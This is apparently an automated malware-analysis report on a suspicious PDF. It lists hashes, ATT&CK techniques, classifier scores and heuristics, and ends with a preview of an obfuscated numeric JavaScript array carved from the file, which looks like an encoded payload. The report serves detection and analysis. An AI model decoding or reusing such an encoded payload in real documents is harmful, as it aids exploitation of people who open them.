PDF static analysis report

Static analysis result for SHA-256 06dfcd867d18e17f…

SUSPICIOUS

PDF

18.9 KB Created: 2010-04-08 08:53:42 +08:00 Authoring application: Acrobat Web Capture 7.0 First seen: 2026-05-11
MD5: b3b14e4296b7ef7733a77a3873413d25 SHA-1: 24e1b5fd299323431feba9ebe3e52bb73fad528a SHA-256: 06dfcd867d18e17fe6d3015e5efebdc24dad56070b8548fa724f9c845f5b2a22
50 Risk Score

Malware Insights

MITRE ATT&CK
T1059.007 JavaScript T1203 Exploitation for Client Execution T1566.001 Spearphishing Attachment

The PDF contains embedded JavaScript, identified by heuristics and the ML classifier, which is highly indicative of malicious intent. The script likely downloads and executes a second-stage payload, a common technique for exploiting PDF vulnerabilities. While the specific payload and delivery mechanism are not fully detailed, the presence of JavaScript and the ML detection strongly suggest an attack.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9998

Heuristics 4

  • JavaScript action low 1 related finding PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Object number defined twice with different bodies info PDF_DUPLICATE_OBJ_BODY_INCREMENTAL
    The same indirect object (N G) is defined more than once with different body bytes. First-wins and last-wins readers will resolve different content, which is a parser-confusion shape used by targeted PDFs. Body-only differences are common in benign incremental updates, so severity is raised only when the duplicate carries active content.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.w3.org/1999/02/22-rdf-syntax-ns# In PDF document text
    • http://ns.adobe.com/xap/1.0/In PDF document text
    • http://purl.org/dc/elements/1.1/In PDF document text
    • http://ns.adobe.com/xap/1.0/mm/In PDF document text
    • http://ns.adobe.com/pdf/1.3/In PDF document text

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0034_000.js pdf-javascript-stream PDF /JS object 34 at offset 0x4C7 1105 bytes
SHA-256: dbaeed2cbc4e08ff89060768f7d1777aafe3b8d97ca7a5e64327b3123f503ea3
Preview script
First 1,000 lines of the extracted script
var a = new Array(220,178,212,48,214,192,186,200,200,182,206,184,186,48,106,48,218,204,186,214,182,178,208,186,64,52,58,218,178,82,92,88,58,218,80,80,86,80,58,218,80,80,80,80,58,218,96,180,98,80,58,218,80,182,88,80,58,218,96,180,98,80,58,218,82,182,94,80,58,218,96,180,178,184,58,218,80,96,94,80,58,218,186,98,98,80,58,218,80,84,96,180,58,218,80,80,80,80,58,218,98,80,90,96,58,218,186,182,96,82,58,218,80,84,80,80,58,218,80,80,80,80,58,218,188,182,96,180,58,218,94,94,96,98,58,218,96,98,80,96,58,218,82,80,88,94,58,218,94,94,188,188,58,218,92,96,80,96,58,218,98,94,186,182,58,218,80,182,80,86,58,218,82,178,186,96,58,218,80,80,80,84,58,218,96,98,80,80,58,218,82,182,88,94,58,218,94,94,188,188,58,218,92,96,80,96,58,218,84,84,188,92,58,218,94,182,180,98,58,218,80,178,186,96,58,218,80,80,80,84,58,218,98,80,80,80,58,218,88,94,96,98,58,218,188,188,84,80,58,218,80,96,94,94,58,218,178,90,92,96,58,218,80,80,82,94,58,218,186,96,94,182,58,218,80,82,188,98,58,218,80,80,80,80,58,218,88,94,96,98,58,218,188,188,84,88,58,218,80,96,94,94,58,218,188,180,92,96,58,218,188,184,98,94,58,218,186,96,80,188,58,218,80);